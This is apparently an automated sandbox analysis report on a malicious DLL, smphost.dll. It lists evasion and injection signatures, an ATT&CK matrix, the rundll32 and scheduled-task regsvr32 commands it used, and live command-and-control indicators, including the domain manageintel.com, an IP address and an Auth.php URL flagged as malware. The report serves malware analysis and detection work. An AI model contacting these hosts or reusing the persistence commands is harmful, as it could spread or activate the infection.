Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244	Thread sleep time: -330000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9EED8A FindFirstFileExW,		2_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F84ED8A FindFirstFileExW,		38_2_6F84ED8A

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eCATR3i7EpbaN9iNfeSlpa+LReiKwHVl5h2XxKhGfSRSHDvGdRfoP4L+/8cPCQAA
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW,

2_2_6E9E9CF7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6E9EFE17 GetProcessHeap,

2_2_6E9EFE17

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9E1710 mov eax, dword ptr fs:[00000030h]	2_2_6E9E1710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9E1490 mov eax, dword ptr fs:[00000030h]	2_2_6E9E1490
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9E83B0 mov eax, dword ptr fs:[00000030h]	2_2_6E9E83B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9EC865 mov eax, dword ptr fs:[00000030h]	2_2_6E9EC865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h]	2_2_6E9EE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F841710 mov eax, dword ptr fs:[00000030h]	38_2_6F841710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F841490 mov eax, dword ptr fs:[00000030h]	38_2_6F841490
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F8483B0 mov eax, dword ptr fs:[00000030h]	38_2_6F8483B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F84E9B4 mov eax, dword ptr fs:[00000030h]	38_2_6F84E9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F84C865 mov eax, dword ptr fs:[00000030h]	38_2_6F84C865

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E9E9AED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E9EC0A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E9E9839
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F849AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_6F849AED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F84C0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_6F84C0A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 38_2_6F849839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_6F849839

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6E9E9658 cpuid

2_2_6E9E9658

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_6E9E99A8

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_6E9E8630

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	111 Process Injection	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Regsvr32	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	4 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Rundll32	Cached Domain Credentials	1 System Network Connections Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	23 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
smphost.dll	9%	Virustotal		Browse
smphost.dll	7%	ReversingLabs	Win32.Dropper.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\6\5507.ocx	7%	ReversingLabs	Win32.Dropper.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
manageintel.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://manageintel.com/WUzZRUBQje/Auth.php	100%	Avira URL Cloud	malware
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml	0%	Avira URL Cloud	safe
https://manageintel.com/WUzZRUBQje/vAtVEC.xml	0%	Avira URL Cloud	safe
https://manageintel.com/	0%	Avira URL Cloud	safe
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
manageintel.com	185.14.31.158	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://manageintel.com/WUzZRUBQje/Auth.php	true	Avira URL Cloud: malware	unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml	true	Avira URL Cloud: safe	unknown
https://manageintel.com/WUzZRUBQje/vAtVEC.xml	true	Avira URL Cloud: safe	unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://manageintel.com/	regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.14.31.158	manageintel.com	Ukraine		21100	ITLDC-NLUA	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562835
Start date:	30.01.2022
Start time:	13:29:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	smphost.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winDLL@22/7@16/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 94.6%) Quality average: 80.8% Quality standard deviation: 26.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 45 Number of non-executed functions: 58
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 184.87.212.60, 2.20.157.220, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:29:59	API Interceptor	41x Sleep call for process: regsvr32.exe modified
13:30:03	API Interceptor	10x Sleep call for process: rundll32.exe modified
13:30:09	API Interceptor	11x Sleep call for process: loaddll32.exe modified
13:30:37	Task Scheduler	Run new task: 5507 path: %windir%\system32\regsvr32.exe s>-e C:\ProgramData\6\5507.ocx
13:31:13	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ITLDC-NLUA	5AEEB53A492389BFAAA1A2D15B98324C159DED6CD2E55.exe	Get hash	malicious	Browse	185.14.28.12
	3FB154482EF8AE49941C9ED13063294CD4F97E28E5DD8.exe	Get hash	malicious	Browse	185.14.28.12
	3D41425DAA1E1844BE0539723042DC532A640E5BA9EF9.exe	Get hash	malicious	Browse	185.14.28.12
	ADA6977ABF5CAA24A75F0DB17220267F6B05F11ED9497.exe	Get hash	malicious	Browse	185.14.28.12
	70E14DDF23A5FE3D69CC50752FCC491AA2964A2CFEE3D.exe	Get hash	malicious	Browse	185.14.28.12
	SecuriteInfo.com.Trojan.PWS.Stealer.32040.19380.exe	Get hash	malicious	Browse	185.198.164.33
	4809227EE49AED05EEA812EC5FE60084177AE90A76E5A.exe	Get hash	malicious	Browse	185.14.28.12
	05E2540B7113609289FFB8CCDCB605AA6DAC2873DCCE1.exe	Get hash	malicious	Browse	185.14.28.12
	6104F2B4049168FEA236BB6A5B9A5194B878B61F87336.exe	Get hash	malicious	Browse	185.14.28.12
	54BCD3308C140C8EC030F98697CC7F0E9D4585D54334A.exe	Get hash	malicious	Browse	185.14.28.12
	07C18E8E0F92E75367DF02C4114947B038E86FCBC7C8E.exe	Get hash	malicious	Browse	185.14.28.12
	ev8zhBsCzU.exe	Get hash	malicious	Browse	185.14.28.12
	O5t4RGAkKg.exe	Get hash	malicious	Browse	185.14.28.12
	#U3061#U3066#U3082#U3064#U305f#U3044#U30c1#U3059#U30b8.exe	Get hash	malicious	Browse	91.235.129.60
	PO#5689.xlsx	Get hash	malicious	Browse	185.237.206.163
	3964A1E13D2B3EE0C3C34B50D4785907C3FFD560DC3E4.exe	Get hash	malicious	Browse	185.14.28.12
	1C57E67BF823C9C15D3AFB19746746DF06A218FB70816.exe	Get hash	malicious	Browse	185.14.28.12
	QAFfhYtsqj	Get hash	malicious	Browse	5.34.180.214
	COAU7229898130.xlsx	Get hash	malicious	Browse	31.40.251.230
	HyjRfWrgtY	Get hash	malicious	Browse	5.34.180.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	2FxSGgG22a.exe	Get hash	malicious	Browse	185.14.31.158
	zx4AMX5P5x.exe	Get hash	malicious	Browse	185.14.31.158
	LlgtTPbJKz.exe	Get hash	malicious	Browse	185.14.31.158
	l2OGKn1Tzq.exe	Get hash	malicious	Browse	185.14.31.158
	Tlzn4Evfdh.docx	Get hash	malicious	Browse	185.14.31.158
	1ON7A70quI.exe	Get hash	malicious	Browse	185.14.31.158
	N2UHGxYj1P.exe	Get hash	malicious	Browse	185.14.31.158
	5AEEB53A492389BFAAA1A2D15B98324C159DED6CD2E55.exe	Get hash	malicious	Browse	185.14.31.158
	IV5Mp1B4F7.exe	Get hash	malicious	Browse	185.14.31.158
	h9s1i5vfQE.exe	Get hash	malicious	Browse	185.14.31.158
	9TpV4rfMmJ.exe	Get hash	malicious	Browse	185.14.31.158
	Pago.xls	Get hash	malicious	Browse	185.14.31.158
	QRT_4_377305.htm	Get hash	malicious	Browse	185.14.31.158
	Noua lista de comenzi.exe	Get hash	malicious	Browse	185.14.31.158
	Eliec-paymentRkWNsmwXKp7EnKy2b8nmfV13jGiOm2F4402fcsCzgobIiHIqZb.HtML	Get hash	malicious	Browse	185.14.31.158
	FAX-ET_REMIT103INV364783-PDF.htm	Get hash	malicious	Browse	185.14.31.158
	Payment Advice for Outstanding Invoices.exe	Get hash	malicious	Browse	185.14.31.158
	Secure_Message_81.90.a1.00.00.htm	Get hash	malicious	Browse	185.14.31.158
	Secure_Message_81.90.a1.00.00.htm	Get hash	malicious	Browse	185.14.31.158
	Invoice4334567.htm	Get hash	malicious	Browse	185.14.31.158

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\6\5507.ocx

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	147656
Entropy (8bit):	6.319927202557722
Encrypted:	false
SSDEEP:	3072:biKjfYjd3b9fSCNq01bKrF5HiLCK08WA46tvTj:+QfYjBMCNcC+KlWuB3
MD5:	FC484855692F2A7D1EAE090086A1EB72
SHA1:	2E9103747750B40835F58D9E57C2AB75EEAF25F6
SHA-256:	E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E
SHA-512:	2F6B6E8AA82DC4AA61A540BAE1D98682EC79E73CCFEAF9C273B053C2162F35207842F7AB2F1BC06E927D706EC88ECF209D2C57E86323C38FB43E9D694E624311
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 7%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.x.b.x.b.x.b...c.x.b...c`x.b...c.x.b...c.x.b...c.x.b...c.x.b...c.x.b.x.b.x.b...c.x.b...c.x.b...c.x.bRich.x.b........................PE..L......a.........."!.....:..................P...............................`...........@.........................0....................V...............&......,...................................(...@............P...............................text...99.......:.................. ..`.rdata...e...P...f...>..............@..@.data... ...........................@....reloc..,...........................@..B.rsrc....V.......X..................@..@................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_e8da9d9d47a999f039c77c46f5a596d8854d75e_7a325c51_195cb6b3\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0976160892483657
Encrypted:	false
SSDEEP:	192:1Ezc5b6Vt0H+G0cXlje9+X9yww/u7sNS274ItU:oc16VW+G0ajeYG/u7sNX4ItU
MD5:	4B1B0E8495D23C9A6B6258ED7D331BE7
SHA1:	2F28B18E4031D078CAB6D972990A1868461365DE
SHA-256:	68949226D86CAF86FCD5EC23EBE339B579AD08EA394855F127BB05FE3B3FC66A
SHA-512:	3F668FB88564EDAD1B536DF7C0FEE41273FBE6AA7F840FB362D6528BD1D2AC2C1536114E33D266FB65171565E462DCD51D8AFADC84AE17FC7390B286D24FAEB2
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.8.0.5.1.8.5.6.1.7.4.6.0.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.8.0.5.1.8.7.1.4.7.1.4.4.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.1.f.7.e.1.b.-.e.9.3.8.-.4.e.7.c.-.a.2.c.8.-.9.8.f.c.7.d.d.7.d.9.1.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.9.c.3.3.f.d.-.e.7.1.e.-.4.0.5.3.-.a.c.4.2.-.7.c.4.8.5.9.5.8.4.e.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.f.8.-.0.0.0.1.-.0.0.1.c.-.5.c.9.4.-.8.d.8.8.2.0.1.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E8B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8272
Entropy (8bit):	3.6935513744694903
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiAr6enG6Y306ugmfJTSZX4NCprb89bV8sf0XHm:RrlsNiU6enG6Yk6ugmfJTS6VPfT
MD5:	9AC519D1F30DFC7823590054A1628202
SHA1:	534BD1C26250B8D3DE0A52A0092E456659C3BD9E
SHA-256:	FEA4B47B5080CC0BFA1E8F8F9721C678BBFD751BE1B37509DC6A63BE7801FE0D
SHA-512:	84F933BEC412D14514E2B0042138851A8B564C93696ABA37442DE1A6B12BD207587C16CBE62E705EE14F7E3D7D72C537C697815FB1B0EFBFD647B1C1FDF06734
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.7.6.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.453126548922244
Encrypted:	false
SSDEEP:	48:cvIwSD8zs/JgtWI9s84WWSC8Bs8fm8M4JkCFMff+q8p3oKJYhgd:uITfhQuSNDJMfgoqYhgd
MD5:	8B06714A9AEBAE2BA184D11D1BC0C1C0
SHA1:	F0FC84A0A1D6E1C61A6F71D007F0B6B68F454DC4
SHA-256:	B94EFBD2A0C34AC646708D6CB1004ABB13E7E8975639E00905B2881EF17555C2
SHA-512:	2D35D224905ACDB0BC899780A943EE4DDF3F396227998E4F8A0EA7DF895006CDD08F6366C41A832E3B3994FC162A8B529A3184CB1DEF8933A74E680DFAC928DA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1365521" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Jan 30 21:31:02 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	122464
Entropy (8bit):	2.1643437147123894
Encrypted:	false
SSDEEP:	768:cBgVbyEqeA2b/V2a8gtuVfHeFNFf5UKXv:Pxr41eF3f5UKX
MD5:	5FA42D0F77CA7CD672BA664CA5219DFE
SHA1:	93A963564FCF186267C675C7E66244CB14587984
SHA-256:	BC158DDC546EA1A1F718D15776E4AA9A39A13E9BF2AB64191E7AAA13DCF46A9A
